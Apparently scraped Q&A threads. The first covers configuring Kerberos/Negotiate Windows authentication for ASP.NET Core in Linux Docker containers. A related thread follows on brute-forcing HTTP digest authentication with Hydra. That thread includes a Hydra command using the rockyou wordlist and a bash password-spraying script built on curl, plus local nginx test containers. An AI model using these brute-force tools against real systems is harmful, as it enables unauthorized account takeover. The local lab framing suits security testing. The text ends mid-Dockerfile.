Windows authentication in linux docker container - kerberos

i am trying to use windows authentication in linux docker container under kubernetes.
I am following this settings: https://learn.microsoft.com/en-us/aspnet/core/security/authentication/windowsauth?view=aspnetcore-3.1&tabs=visual-studio#kestrel
App is in .net core3, with nuget Microsoft.AspNetCore.Authentication.Negotiate and running in kestrel
I have added the
services.AddAuthentication(Microsoft.AspNetCore.Authentication.Negotiate.NegotiateDefaults.AuthenticationScheme).AddNegotiate();
as well as
app.UseAuthentication();
and setup my devbase image as
FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster as final
USER root
RUN whoami
RUN apt update && apt dist-upgrade -y
ADD ca/ca.crt /usr/local/share/ca-certificates/ca.crt
RUN chmod 644 /usr/local/share/ca-certificates/*
RUN update-ca-certificates
RUN DEBIAN_FRONTEND=noninteractive apt install -y krb5-config krb5-user
COPY krb5.conf /etc/krb5.conf
RUN mkdir /app
RUN echo BQIAAA..== | base64 -d > /app/is.k01.HTTP.keytab
WORKDIR /app
#RUN docker version
RUN groupadd --gid 1000 app && useradd --uid 1000 --gid app --shell /bin/bash -d /app app
RUN apt install -y mc sudo syslog-ng realmd gss-ntlmssp
the build in tfs pipeline creates app docker image derived from above and adds following env variables, also copies build to /app
RUN chmod 0700 run.sh
ENV KRB5_KTNAME=/app/is.k01.HTTP.keytab
ENV KRB5_TRACE=/dev/stdout
ENV ASPNETCORE_URLS=http://*:80;https://+:443
RUN chown app:app /app -R
USER app
the app is being run by run.sh
service syslog-ng start
kinit HTTP/is.k01.mydomain.com#MYDOMAIN.COM -k -t /app/is.k01.HTTP.keytab
klist
dotnet dev-certs https
dotnet /app/SampleApi.dll
klist lists the principal which has assigned the SPN to the machine
in ie and firefox i have added the network.negotiate-auth.trusted-uris to my app
however i am getting the login dialog with no success to log in
so the question is:
How can I enable debug log with Microsoft.AspNetCore.Authentication.Negotiate package?
My assumption is that this package does not communicate with kerberos properly, perhaps some package is missing, not running or something.
Also note that the container and .net app is connected successfully to the domain because I use integrated security for connection to the database which works.
**** Edit > Answer to first part
To enable logs, one should enable logs in kestrel:
in appsettings.json:
"Logging": {
"LogLevel": {
"Default": "Debug",
}
},
In program.cs:
Host.CreateDefaultBuilder(args)
.ConfigureLogging(logging =>
{
logging.AddFilter("Microsoft", LogLevel.Debug);
logging.AddFilter("System", LogLevel.Debug);
logging.ClearProviders();
logging.AddConsole();
})
.ConfigureWebHostDefaults(webBuilder =>
{
In Startup.cs one can track the negotiate events:
services.AddAuthentication(NegotiateDefaults.AuthenticationScheme).AddNegotiate(
options =>
{
options.PersistKerberosCredentials = true;
options.Events = new NegotiateEvents()
{
OnAuthenticated = challange =>
{
..
},
OnChallenge = challange =>
{
..
},
OnAuthenticationFailed = context =>
{
// context.SkipHandler();
Console.WriteLine($"{DateTimeOffset.Now.ToString(czechCulture)} OnAuthenticationFailed/Scheme: {context.Scheme.Str()}, Request: {context.Request.Str()}");
Console.WriteLine("context?.HttpContext?.Features?.Select(f=>f.Key.Name.ToString())");
var items = context?.HttpContext?.Features?.Select(f => "- " + f.Key?.Name?.ToString());
if (items != null)
{
Console.WriteLine(string.Join("\n", items));
}
Console.WriteLine("context.HttpContext.Features.Get<IConnectionItemsFeature>()?.Items " + context.HttpContext.Features.Get<IConnectionItemsFeature>()?.Items?.Count);
var items2 = context.HttpContext?.Features.Get<IConnectionItemsFeature>()?.Items?.Select(f => "- " + f.Key?.ToString() + "=" + f.Value?.ToString());
if (items2 != null) {
Console.WriteLine(string.Join("\n", items2));
}
return Task.CompletedTask;
}
};
}
);
**** Edit
Meanwhile according my goal to allow windows authentication in .net core docker web app i was going through the source code of .net core, and corefx and trucated the auth code to this sample console app:
try
{
var token = "MyToken==";
var secAssembly = typeof(AuthenticationException).Assembly;
Console.WriteLine("var ntAuthType = secAssembly.GetType(System.Net.NTAuthentication, throwOnError: true);");
var ntAuthType = secAssembly.GetType("System.Net.NTAuthentication", throwOnError: true);
Console.WriteLine("var _constructor = ntAuthType.GetConstructors(BindingFlags.NonPublic | BindingFlags.Instance).First();");
var _constructor = ntAuthType.GetConstructors(BindingFlags.NonPublic | BindingFlags.Instance).First();
Console.WriteLine("var credential = CredentialCache.DefaultCredentials;");
var credential = CredentialCache.DefaultCredentials;
Console.WriteLine("var _instance = _constructor.Invoke(new object[] { true, Negotiate, credential, null, 0, null });");
var _instance = _constructor.Invoke(new object[] { true, "Negotiate", credential, null, 0, null });
var negoStreamPalType = secAssembly.GetType("System.Net.Security.NegotiateStreamPal", throwOnError: true);
var _getException = negoStreamPalType.GetMethods(BindingFlags.NonPublic | BindingFlags.Static).Where(info => info.Name.Equals("CreateExceptionFromError")).Single();
Console.WriteLine("var _getOutgoingBlob = ntAuthType.GetMethods(BindingFlags.NonPublic | BindingFlags.Instance).Where(info => info.Name.Equals(GetOutgoingBlob) && info.GetParameters().Count() == 3).Single();");
var _getOutgoingBlob = ntAuthType.GetMethods(BindingFlags.NonPublic | BindingFlags.Instance).Where(info => info.Name.Equals("GetOutgoingBlob") && info.GetParameters().Count() == 3).Single();
Console.WriteLine("var decodedIncomingBlob = Convert.FromBase64String(token);;");
var decodedIncomingBlob = Convert.FromBase64String(token);
Console.WriteLine("var parameters = new object[] { decodedIncomingBlob, false, null };");
var parameters = new object[] { decodedIncomingBlob, false, null };
Console.WriteLine("var blob = (byte[])_getOutgoingBlob.Invoke(_instance, parameters);");
var blob = (byte[])_getOutgoingBlob.Invoke(_instance, parameters);
if (blob != null)
{
Console.WriteLine("var out1 = Convert.ToBase64String(blob);");
var out1 = Convert.ToBase64String(blob);
Console.WriteLine(out1);
}
else
{
Console.WriteLine("null blob value returned");
var securityStatusType = secAssembly.GetType("System.Net.SecurityStatusPal", throwOnError: true);
var _statusException = securityStatusType.GetField("Exception");
var securityStatus = parameters[2];
var error = (Exception)(_statusException.GetValue(securityStatus) ?? _getException.Invoke(null, new[] { securityStatus }));
Console.WriteLine("Error:");
Console.WriteLine(error);
Console.WriteLine("securityStatus:");
Console.WriteLine(securityStatus.ToString());
}
}
catch(Exception exc)
{
Console.WriteLine(exc.Message);
}
So i found out that the library communicates with
System.Net.NTAuthentication
which communicates with
System.Net.Security.NegotiateStreamPal
which communicates with unix version of
Interop.NetSecurityNative.InitSecContext
which should somehow trigger the GSSAPI in os
In dotnet runtime git they tell us that gss-ntlmssp is required for this to work even that it is not mentioned anyhow in the aspnet core documentation.
https://github.com/dotnet/runtime/issues?utf8=%E2%9C%93&q=gss-ntlmssp
Nevertheless I have compiled the gss-ntlmssp and found out that without this library it throws error "An unsupported mechanism was requested.". With my library it throws error "No credentials were supplied, or the credentials were unavailable or inaccessible.", but never access to any gss_* methods.
I have tested usage of gss methods by adding the log entry to file which never occured.. fe:
OM_uint32 gss_init_sec_context(OM_uint32 *minor_status,
gss_cred_id_t claimant_cred_handle,
gss_ctx_id_t *context_handle,
gss_name_t target_name,
gss_OID mech_type,
OM_uint32 req_flags,
OM_uint32 time_req,
gss_channel_bindings_t input_chan_bindings,
gss_buffer_t input_token,
gss_OID *actual_mech_type,
gss_buffer_t output_token,
OM_uint32 *ret_flags,
OM_uint32 *time_rec)
{
FILE *fp;
fp = fopen("/tmp/gss-debug.log", "w+");
fprintf(fp, "gss_init_sec_context\n");
fclose(fp);
return gssntlm_init_sec_context(minor_status,
claimant_cred_handle,
context_handle,
target_name,
mech_type,
req_flags,
time_req,
input_chan_bindings,
input_token,
actual_mech_type,
output_token,
ret_flags,
time_rec);
}
So .net calls gssapi, and gssapi does not call mechanism.
I have observed the same behavior in centos7 vm, ubuntu windows subsystem, and debian docker image (customized mcr.microsoft.com/dotnet/core/sdk:3.1-buster)
So the question now is, how can I debug gssapi ?
I assume my current gssapi is managed by this library:
readelf -d /usr/lib64/libgssapi_krb5.so
Dynamic section at offset 0x4aa48 contains 34 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libkrb5.so.3]
0x0000000000000001 (NEEDED) Shared library: [libk5crypto.so.3]
0x0000000000000001 (NEEDED) Shared library: [libcom_err.so.2]
0x0000000000000001 (NEEDED) Shared library: [libkrb5support.so.0]
0x0000000000000001 (NEEDED) Shared library: [libdl.so.2]
0x0000000000000001 (NEEDED) Shared library: [libkeyutils.so.1]
0x0000000000000001 (NEEDED) Shared library: [libresolv.so.2]
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
0x000000000000000e (SONAME) Library soname: [libgssapi_krb5.so.2]
0x000000000000000c (INIT) 0xb1d8
0x000000000000000d (FINI) 0x3ebcc
0x0000000000000019 (INIT_ARRAY) 0x24a120
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000000000001a (FINI_ARRAY) 0x24a128
0x000000000000001c (FINI_ARRAYSZ) 16 (bytes)
0x000000006ffffef5 (GNU_HASH) 0x1f0
0x0000000000000005 (STRTAB) 0x3048
0x0000000000000006 (SYMTAB) 0x720
0x000000000000000a (STRSZ) 9167 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000003 (PLTGOT) 0x24b000
0x0000000000000002 (PLTRELSZ) 8088 (bytes)
0x0000000000000014 (PLTREL) RELA
0x0000000000000017 (JMPREL) 0x9240
0x0000000000000007 (RELA) 0x58b0
0x0000000000000008 (RELASZ) 14736 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000006ffffffc (VERDEF) 0x5788
0x000000006ffffffd (VERDEFNUM) 3
0x000000006ffffffe (VERNEED) 0x57e0
0x000000006fffffff (VERNEEDNUM) 4
0x000000006ffffff0 (VERSYM) 0x5418
0x000000006ffffff9 (RELACOUNT) 504
0x0000000000000000 (NULL) 0x0
so far i have compiled new latest gssapi from mit source, and found out that it is throwing me error "An unsupported mechanism was requested." because gssapi requires gss interpreter which is not provided. In centos7 i had another issue that the openssl library was using shared kerberos library which was incompatible, thus yum stopped working.
*** edit
I have found out that the gss-ntlmssp has flag GSS_C_MA_NOT_DFLT_MECH thus it was failing with the message "No credentials were supplied, or the credentials were unavailable or inaccessible.". The solution is to build custom gss-ntlmssp without this attribute because i desire to use it as default auth mechanism.
My sample console app to check credentials works now, I will try to put it work in docker container now.
*** edit
I was able to run my ConsoleApp successfully in kubernetes:
FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster as final
USER root
RUN whoami
RUN apt update && apt dist-upgrade -y
ADD ca/ca.crt /usr/local/share/ca-certificates/ca.crt
RUN chmod 644 /usr/local/share/ca-certificates/*
RUN update-ca-certificates
RUN DEBIAN_FRONTEND=noninteractive apt install -y krb5-config krb5-user
RUN mkdir /app
RUN apt install -y mc sudo syslog-ng python3-software-properties software-properties-common packagekit git gssproxy vim
RUN apt install -y autoconf automake libxslt-dev doxygen findutils libgettextpo-dev libtool m4 make libunistring-dev libssl-dev zlib1g-dev gettext xsltproc libxml2-utils libxml2-dev xml-core docbook-xml docbook-xsl bison libkrb5-dev
RUN systemctl enable syslog-ng
RUN mkdir /src
RUN cd /src && wget https://web.mit.edu/kerberos/dist/krb5/1.18/krb5-1.18.tar.gz
RUN cd /src && tar -xf krb5-1.18.tar.gz
RUN cd /src/krb5-1.18/src && ./configure && make && make install
RUN cd /src && git clone https://github.com/scholtz/gss-ntlmssp.git
RUN cd /src/gss-ntlmssp/ && autoreconf -f -i && ./configure && make && make install
RUN cp /src/gss-ntlmssp/examples/mech.ntlmssp.conf /etc/gss/mech.d/mech.ntlmssp.conf
COPY testgss /testgss
RUN cd /testgss && dotnet ConsoleApp3.dll
RUN groupadd --gid 1000 app && useradd --uid 1000 --gid app --shell /bin/bash -d /app app
RUN echo BQIA..AAAB | base64 -d > /app/user.keytab
RUN echo BQIA..oQ== | base64 -d > /etc/krb5.keytab
RUN echo BQIA..oQ== | base64 -d > /app/is.k01.HTTP.keytab
RUN echo BQIA..AAA= | base64 -d > /app/is.k01.kerb.keytab
COPY krb5.conf /etc/krb5.conf
COPY krb5.conf /usr/local/etc/krb5.conf
RUN ln -s /etc/gss /usr/local/etc/gss
RUN cd /app
WORKDIR /app
However, i am getting this error now:
System.Exception: An authentication exception occured (0xD0000/0x4E540016).
---> Interop+NetSecurityNative+GssApiException: GSSAPI operation failed with error - Unspecified GSS failure. Minor code may provide more information (Feature not available).
at System.Net.Security.NegotiateStreamPal.GssAcceptSecurityContext(SafeGssContextHandle& context, Byte[] buffer, Byte[]& outputBuffer, UInt32& outFlags)
at System.Net.Security.NegotiateStreamPal.AcceptSecurityContext(SafeFreeCredentials credentialsHandle, SafeDeleteContext& securityContext, ContextFlagsPal requestedContextFlags, Byte[] incomingBlob, ChannelBinding channelBinding, Byte[]& resultBlob, ContextFlagsPal& contextFlags)
*** edit
Now it fails in here:
gssntlm_init_sec_context..
gssntlm_acquire_cred..
gssntlm_acquire_cred_from..
if (cred_store != GSS_C_NO_CRED_STORE) {
retmin = get_creds_from_store(name, cred, cred_store);
} else {
retmin = get_user_file_creds(name, cred);
if (retmin) {
retmin = external_get_creds(name, cred);
}
}
get_user_file_creds() returns error as i do not have specific file setup as i want to verify users from ad
external_get_creds() fails here:
wbc_status = wbcCredentialCache(&params, &result, NULL);
if(!WBC_ERROR_IS_OK(wbc_status)) goto done;
external_get_creds tries to authenticate with winbind library and obviously in the credential cache there is no user present
i managed to compile it with the winbind library that samba has provided
so the question now is:
How to setup winbind library to communicate with AD?
*** Edit
I have tried to use .net 5 as at github i was told that NTLM works in .net 5. However i get the same result as with .net 3.1.
Docker image with which i have tried that:
FROM mcr.microsoft.com/dotnet/core-nightly/sdk:5.0-buster as final
USER root
RUN whoami
RUN apt update && apt dist-upgrade -y
RUN DEBIAN_FRONTEND=noninteractive apt install -y krb5-config krb5-user
RUN mkdir /app
RUN apt install -y mc sudo syslog-ng python3-software-properties software-properties-common packagekit git gssproxy vim apt-utils
RUN apt install -y autoconf automake libxslt-dev doxygen findutils libgettextpo-dev libtool m4 make libunistring-dev libssl-dev zlib1g-dev gettext xsltproc libxml2-utils libxml2-dev xml-core docbook-xml docbook-xsl bison libkrb5-dev
RUN systemctl enable syslog-ng
RUN mkdir /src
#RUN cd /src && git clone https://github.com/scholtz/gss-ntlmssp.git
RUN DEBIAN_FRONTEND=noninteractive apt install -y libwbclient-dev samba samba-dev
#RUN cat /usr/include/samba-4.0/wbclient.h
COPY gss-ntlmssp /usr/local/src/gss-ntlmssp
RUN cd /usr/local/src/gss-ntlmssp/ && autoreconf -f -i && ./configure && make && make install
RUN cp /usr/local/src/gss-ntlmssp/examples/mech.ntlmssp.conf /etc/gss/mech.d/mech.ntlmssp.conf
RUN groupadd --gid 1000 app && useradd --uid 1000 --gid app --shell /bin/bash -d /app app
RUN echo BQIAAABMA..ArHdoQ== | base64 -d > /etc/krb5.keytab
COPY krb5.conf /etc/krb5.conf
COPY smb.conf /etc/samba/smb.conf
COPY krb5.conf /usr/local/etc/krb5.conf
RUN DEBIAN_FRONTEND=noninteractive apt install -y winbind
ENV KRB5_TRACE=/dev/stdout
RUN mkdir /src2
WORKDIR /src2
RUN dotnet --list-runtimes
RUN dotnet new webapi --auth Windows
RUN dotnet add package Microsoft.AspNetCore.Authentication.Negotiate
RUN sed -i '/services.AddControllers/i services.AddAuthentication(Microsoft.AspNetCore.Authentication.Negotiate.NegotiateDefaults.AuthenticationScheme).AddNegotiate();' Startup.cs
RUN sed -i '/app.UseAuthorization/i app.UseAuthentication();' Startup.cs
run echo a
RUN cat Startup.cs
RUN dotnet restore
RUN dotnet build
ENV ASPNETCORE_URLS="http://*:5002;https://*:5003"
EXPOSE 5002
EXPOSE 5003
RUN cd /app
WORKDIR /app
docker run -it -p 5003:5003 -it registry.k01.mydomain.com/k01-devbase:latest
In docker container:
kinit HTTP/myuser#MYDOMAIN.COM -k -t /etc/krb5.keytab
klist
dotnet run src2.dll
I have put my own debug info in gssntlmssp library and i put it to file
cat /tmp/gss-debug.log
This is exactly the same end where i finished with .net core 3.1 .
wbcCredentialCache (samba lib) fails at the point where it cannot find cached credentials
This is my krb5.conf:
[appdefaults]
default_lifetime = 25hrs
krb4_convert = false
krb4_convert_524 = false
ksu = {
forwardable = false
}
pam = {
minimum_uid = 100
forwardable = true
}
pam-afs-session = {
minimum_uid = 100
}
[libdefaults]
default_realm = MYDOMAIN.COM
[realms]
MYDOMAIN.COM = {
kdc = DC01.MYDOMAIN.COM
default_domain = MYDOMAIN.COM
}
[domain_realm]
mydomain.com. = MYDOMAIN.COM
.mydomain.com. = MYDOMAIN.COM
[logging]
default = CONSOLE
default = SYSLOG:INFO
default = FILE:/var/log/krb5-default.log
kdc = CONSOLE
kdc = SYSLOG:INFO:DAEMON
kdc = FILE:/var/log/krb5-kdc.log
admin_server = SYSLOG:INFO
admin_server = DEVICE=/dev/tty04
admin_server = FILE:/var/log/krb5-kadmin.log
and part of samba file:
[global]
security = domain
workgroup = mydomain.com
password server = *
idmap config * : range = 16777216-33554431
template shell = /bin/bash
winbind use default domain = yes
winbind offline logon = false
wins server = 10.0.0.2
In my opinion i would like more to have NTLM then Negotiate because Negotiate is not supported among browsers as far as I know. For example in firefox the person must setup the about:config for negotiate server. Wildcards are not supported, ...
nevertheless it seems that i will not be able to run .net core 5 web app with ntlm, so i will attempt to setup it without the gssntlmssp library now with some default kerberos mechanism. Any idea what is wrong with my krb5.conf settings?
**** Edit
So I am now trying two different approaches:
NTLM - in my opinion this is preferable way as i have seen ntlm authenticate users in iis express for example without the dialog box, and does not require any special configuration in firefox or through group policy (please fix me if I am wrong)
Negotiate
With regards for the negotiate i have managed to make some progres..
With this docker container i was able to get around the unsupported mechanism:
FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster as final
USER root
RUN whoami
RUN apt update && apt dist-upgrade -y
RUN DEBIAN_FRONTEND=noninteractive apt install -y krb5-config krb5-user
RUN mkdir /app
RUN apt install -y mc sudo syslog-ng python3-software-properties software-properties-common packagekit git gssproxy vim apt-utils
RUN apt install -y autoconf automake libxslt-dev doxygen findutils libgettextpo-dev libtool m4 make libunistring-dev libssl-dev zlib1g-dev gettext xsltproc libxml2-utils libxml2-dev xml-core docbook-xml docbook-xsl bison libkrb5-dev
RUN systemctl enable syslog-ng
RUN mkdir /src
RUN groupadd --gid 1000 app && useradd --uid 1000 --gid app --shell /bin/bash -d /app app
RUN echo BQIAAAA8..vI | base64 -d > /etc/krb5.keytab
COPY krb5.conf /etc/krb5.conf
COPY krb5.conf /usr/local/etc/krb5.conf
ADD ca/is.k01.mydomain.com.p12 /etc/ssl/certs/is.k01.mydomain.com.pfx
RUN cd /app
WORKDIR /app
However now I have other issue:
Request ticket server HTTP/is.k01.mydomain.com#MYDOMAIN.com kvno 3 found in keytab but not with enctype rc4-hmac
This seems to me that the keytab is not with rc4-hmac which is true, because the keytab was generated with
ktpass -princ HTTP/is.k01.mydomain.com#MYDOMAIN.COM -pass ***** -mapuser MYDOMAIN\is.k01.kerb -pType KRB5_NT_PRINCIPAL -out c:\temp\is.k01.HTTP.keytab -crypto AES256-SHA1
as the .net documentation says.
I was not able to disallow use of rc4-hmac and allow only newer encoding, so i asked my infra department to generate new keytab with old rc4-hmac encoding.
This step has moved me further and I get this error instead: Request ticket server HTTP/is.k01.mydomain.com#MYDOMAIN.COM kvno 4 not found in keytab; keytab is likely out of date*
Which is very wierd because keytabs cannot get out of date, password has not been changed and was 100% valid one hour ago when the keytab was generated, and there is no information on web - "kvno 4 not found in keytab" fetch only 4 results in google.
**** EDIT
So finally I have managed to make it work :)
The issue with "kvno 4 not found in keytab" was in krb5.conf file, where I in favor of forcing aes encryption i have added lines
# default_tkt_enctypes = aes256-cts-hmac-sha1-96 aes256-cts-hmac-sha1-9
# default_tgs_enctypes = aes256-cts-hmac-sha1-96 aes256-cts-hmac-sha1-9
# permitted_enctypes = aes256-cts-hmac-sha1-96 aes256-cts-hmac-sha1-9
After I have commented them out, the authentication using Negotiate has started to work. I have tested the NTLM with .net 5 and it still does not work.
The krb5.conf file with which negotiate in docker container as build above works :
[appdefaults]
default_lifetime = 25hrs
krb4_convert = false
krb4_convert_524 = false
ksu = {
forwardable = false
}
pam = {
minimum_uid = 100
forwardable = true
}
pam-afs-session = {
minimum_uid = 100
}
[libdefaults]
default_realm = MYDOMAIN.COM
[realms]
MYDOMAIN.COM = {
kdc = DC02.MYDOMAIN.COM
default_domain = MYDOMAIN.COM
}
[domain_realm]
mydomain.com. = MYDOMAIN.COM
.mydomain.com. = MYDOMAIN.COM
[logging]
default = CONSOLE
default = SYSLOG:INFO
default = FILE:/var/log/krb5-default.log
kdc = CONSOLE
kdc = SYSLOG:INFO:DAEMON
kdc = FILE:/var/log/krb5-kdc.log
admin_server = SYSLOG:INFO
admin_server = DEVICE=/dev/tty04
admin_server = FILE:/var/log/krb5-kadmin.log
So the question now: Is there any way how to allow many services run negotiate protocol without adding each to spn by one, and manualy setting the browsers?
So at the moment every new web service must have:
setspn -S HTTP/mywebservice.mydomain.com mymachine
setspn -S HTTP/mywebservice#MYDOMAIN.COM mymachine
and must be allowed in internet explorer > settings > security > webs > Details > domain should be listed there
in firefox about:config > network.negotiate-auth.trusted-uris
chrome as far as i know takes internet explorer settings
i assume that internet explorer settings should be possible somehow update by the domain group policy.. anybody any idea how?
**** EDIT
I have tested wildcard in domain for negotiate settings in browsers and these are the results:
chrome: SUPPORTS *.k01.mydomain.com
ie: SUPPORTS *.k01.mydomain.com
firefox (73.0.1 (64-bit)): DOES NOT SUPPORT *.k01.mydomain.com - only full domain eg is.k01.mydomain.com
edge 44.18362.449.0 - dont know why but none of ie settings were propagated.. not working with *.k01.mydomain.com nor is.k01.mydomain.com
**** EDIT
I have started to use the win auth with negotiate, however I get some issues now in .net core
This code under IIS express shows user in form of MYDOMAIN\myuser:
var userId = string.Join(',', User?.Identities?.Select(c => c.Name)) ?? "?";
In linux it shows as myuser#mydomain.com
User.Indentities.First() under IIS express is WindowsIdentity and I can list all groups of the user
User.Indentities.First() under Linux is ClaimsIdentity with no group information
When I try to restrict it with group in IIS Express i get:
//Access granted
[Authorize(Roles = "MYDOMAIN\\GROUP1")]
//403
[Authorize(Roles = "MYDOMAIN\\GROUP_NOT_EXISTS")]
Linux kestrel with negotiate:
//403
[Authorize(Roles = "MYDOMAIN\\GROUP1")]
So it seems that negotiate in kestrel does not list groups properly. So i am going to investigate now, how to get WindowsIdentity in kestrel.

This article is a good example of misunderstanding how things work. I don't recommend to follow the way(like I did) author described here at all .
Instead, I would recommend learning about Kerberos authentication, how it works, what settings it requires. This article visualizes it good.
First,
If you profile http traffic coming from browser(user Fiddler, for example) you can find a TGS token in the second request.
If it starts with Negotiate TlR then you're doing auth over NTLM.
If it starts with Negotiate YII then you're doing auth over Kerberos.
Second,
Like David said before ASP.NET Core 3.1 doesn't support NTLM on Linux at all. So if you have TlR token and ntlm-gssapi mechanism you will get "No credentials were supplied, or the credentials were unavailable or inaccessible." error.
If you have TlR token and use default Kerberos mechanism you will get "An unsupported mechanism was requested."
Next,
The only way to get your app works well is to create SPNs and generate keytab correctly for Kerberos authentication. Unfortunately, this is not documented well. So, I gonna give an example here to make things more clear.
Let's say you have:
AD domain MYDOMAIN.COM
The web application with host webapp.webservicedomain.com. This can ends with mydomain.com, but not in my case.
Windows machine joined to AD with name mymachine.
Machine account MYDOMAIN\mymachine
Regarding the instructions described here you need to do:
Add new web service SPNs to the machine account:
setspn -S HTTP/webapp.webservicedomain.com mymachine
setspn -S HTTP/webapp#MYDOMAIN.COM mymachine
Use ktpass to generate a keytab file
ktpass -princ HTTP/webapp.webservicedomain.com#MYDOMAIN.COM -pass myKeyTabFilePassword -mapuser MYDOMAIN\mymachine$ -pType KRB5_NT_PRINCIPAL -out c:\temp\mymachine.HTTP.keytab -crypto AES256-SHA1*.
*Make sure MYDOMAIN\mymachine has AES256-SHA1 allowed in AD.
Finally,
After making all above things done and deploying the app into Linux container with keytab the Integrated Windows Authentication is supposed to worked well. My experiment showed you can use keytab wherever you want not only on the host with name "mymachine".

In dotnet runtime git they tell us that gss-ntlmssp is required for this to work even that it is not mentioned anyhow in the aspnet core documentation.
The 'gss-ntlmssp' package is a plug-in for supporting the NTLM protocol for the GSS-API. It supports both raw NTLM protocol as well as NTLM being used as the fallback from Kerberos to NTLM when 'Negotiate' (SPNEGO protocol) is being used. Ref: https://learn.microsoft.com/en-us/openspecs/windows_protocols/MS-SPNG/f377a379-c24f-4a0f-a3eb-0d835389e28a
From reading the discussion above and the image you posted, it appears that the application is trying to actually use NTLM instead of Kerberos. You can tell because the based64 encoded token starts with "T" instead of "Y".
ASP.NET Core server (Kestrel) does NOT support NTLM server-side on Linux at all. It only provides for 'Www-Authenticate: Negotiate' to be sent back to clients. And usually that means that Kerberos would be used. Negotiate can fall back to using NTLM. However, that doesn't work in ASP.NET Core except in .NET 5 which has not shipped yet.
Are you expecting your application to fall back to NTLM? If not, then perhaps the Kerberos environment is not completely set up. This can be caused by a variety of issues including the SPNs and Linux keytab files not being correct. It can also be caused by the client trying to use a username/password that is not part of the Kerberos realm.
This problem is being discussed here: https://github.com/dotnet/aspnetcore/issues/19397
I recommend the conversation continue in the aspnet core repo issue discussion.

Related

Brute forcing http digest with Hydra

I am having some trouble brute forcing a HTTP digest form with Hydra. I am using the following command however when proxied through burp suite hydra I can see hydra is using basic auth and not digest.
How do I get hydra to use the proper auth type?
Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -vV http-get /digest
Request as seen in proxy:
GET /digest HTTP/1.1
Host: 127.0.0.1
Connection: close
Authorization: Basic YWRtaW46aWxvdmV5b3U=
User-Agent: Mozilla/4.0 (Hydra)
I have studied this case, if the digest method is implemented on Nginx or apache servers level, hydra might work. But if the authentication is implemented on the application server like Flask, Expressjs, Django, it will not work at all
You can create a bash script for password spraying
#!/bin/bash
cat $1 | while read USER; do
cat $2 | while read PASSWORD; do
if curl -s $3 -c /tmp/cookie --digest -u $USER:$PASSWORD | grep -qi "unauth"
then
continue
else
echo [+] Found $USER:$PASSWORD
exit 0
fi
done
done
Save this file as app.sh
$ chmod +x app.sh
$ ./app.sh /path/to/users.txt /path/to/passwords.txt http://example.com/path
Since no Hydra version was specified, I assume the latest one: 9.2.
#tbhaxor is correct:
Against a server like Apache or nginx Hydra works. Flask using digest authentication as recommended in the standard documentation does not work (details later). You could add the used web server so somebody can verify this.
Hydra does not provide explicit parameters to distinguish between basic and digest authentication.
Technically, it first sends a request that attempts to authenticate itself via basic authentication. After that it evaluates the corresponding response.
The specification of digest authentication states that the web application has to send a header WWW-Authenticate : Digest ... in the response if the requested documented is protected using the scheme.
So Hydra now can distinguish between the two forms of authentication.
If it receives this response (cf. code), it sends a second attempt using digest authentication.
The reason why you only can see basic auth and not digest requests is due to the default setting of what Hydra calls "tasks". This is set to 16 by default, which means it initially creates 16 threads.
Thus, if you go to the 17th request in your proxy you will find a request using digest auth. You can also see the difference if you set the number of tasks to 1 with the parameter -t 1.
Following 3 Docker setups where you can test the differences in basic auth (nginx), digest auth(nginx) and digest auth(Flask) using "admin/password" credentials based upon your example:
basic auth:
cat Dockerfile.http_basic_auth
FROM nginx:1.21.3
LABEL maintainer="secf00tprint"
RUN apt-get update && apt-get install -y apache2-utils
RUN touch /usr/share/nginx/html/.htpasswd
RUN htpasswd -db /usr/share/nginx/html/.htpasswd admin password
RUN sed -i '/^ location \/ {/a \ auth_basic "Administrator\x27s Area";\n\ auth_basic_user_file /usr/share/nginx/html/.htpasswd;' /etc/nginx/conf.d/default.conf
:
sudo docker build -f Dockerfile.http_basic_auth -t http-server-basic-auth .
sudo docker run -ti -p 127.0.0.1:8888:80 http-server-basic-auth
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (nginx):
cat Dockerfile.http_digest
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update && \
# For digest module
DEBIAN_FRONTEND=noninteractive apt-get install -y curl unzip \
# For nginx
build-essential libpcre3 libpcre3-dev zlib1g zlib1g-dev libssl-dev libgd-dev libxml2 libxml2-dev uuid-dev make apache2-utils expect
RUN curl -O https://nginx.org/download/nginx-1.21.3.tar.gz
RUN curl -OL https://github.com/atomx/nginx-http-auth-digest/archive/refs/tags/v1.0.0.zip
RUN tar -xvzf nginx-1.21.3.tar.gz
RUN unzip v1.0.0.zip
RUN cd nginx-1.21.3 && \
./configure --prefix=/usr/share/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/ nginx.lock --pid-path=/run/nginx.pid --modules-path=/etc/nginx/modules --add-module=../nginx-http-auth-digest-1.0.0/ && \
make && make install
COPY generate.exp /usr/share/nginx/html/
RUN chmod u+x /usr/share/nginx/html/generate.exp && \
cd /usr/share/nginx/html/ && \
expect -d generate.exp
RUN sed -i '/^ location \/ {/a \ auth_digest "this is not for you";' /etc/nginx/nginx.conf
RUN sed -i '/^ location \/ {/i \ auth_digest_user_file /usr/share/nginx/html/passwd.digest;' /etc/nginx/nginx.conf
CMD nginx && tail -f /var/log/nginx/access.log -f /var/log/nginx/error.log
:
cat generate.exp
#!/usr/bin/expect
set timeout 70
spawn "/usr/bin/htdigest" "-c" "passwd.digest" "this is not for you" "admin"
expect "New password: " {send "password\r"}
expect "Re-type new password: " {send "password\r"}
wait
:
sudo docker build -f Dockerfile.http_digest -t http_digest .
sudo docker run -ti -p 127.0.0.1:8888:80 http_digest
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (Flask):
cat Dockerfile.http_digest_fask
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update -y && \
apt-get install -y python3-pip python3-dev
